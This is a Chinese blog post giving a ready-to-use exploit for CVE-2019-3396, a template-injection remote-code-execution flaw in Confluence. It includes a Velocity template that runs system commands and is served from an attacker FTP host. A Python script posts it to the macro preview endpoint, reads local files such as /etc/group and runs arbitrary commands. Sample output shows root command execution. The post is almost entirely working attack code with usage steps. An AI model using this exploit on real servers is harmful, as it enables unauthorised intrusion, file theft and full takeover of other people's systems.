CVE-2019-3396 confluence SSTI RCE EXP-可回显

Mr.Wu 626 0

CVE-2019-3396 confluence SSTI RCE

1、把如下代码保存成cmd.vm 放在服务器上,可以使用https协议和ftp协议。 http不行。

#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

2、修改exp里面filename路径如: filename = 'ftp://1.1.1.1/cmd.vm' (使用 python -m pyftpdlib -p 21)

# -*- coding: utf-8 -*-
import re
import sys
import requests

def _read(url):
    result = {}
    # filename = "../web.xml"
    filename = 'file:////etc/group'

    paylaod = url + "/rest/tinymce/1/macro/preview"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        m = re.findall('.*wiki-content">\n(.*)\n            </div>\n', r.text, re.S)

    return m[0]



def _exec(url,cmd):
    result = {}
    filename = "ftp://1.1.1.1/cmd.vm"

    paylaod = url + "/rest/tinymce/1/macro/preview"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd)
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        m = re.findall('.*wiki-content">\n(.*)\n            </div>\n', r.text, re.S)

    return m[0]



if __name__ == '__main__':
    url = sys.argv[1]
    cmd = sys.argv[2]
    print _exec(url,cmd)

3、执行python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
例如:

$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)

复现

参考

https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ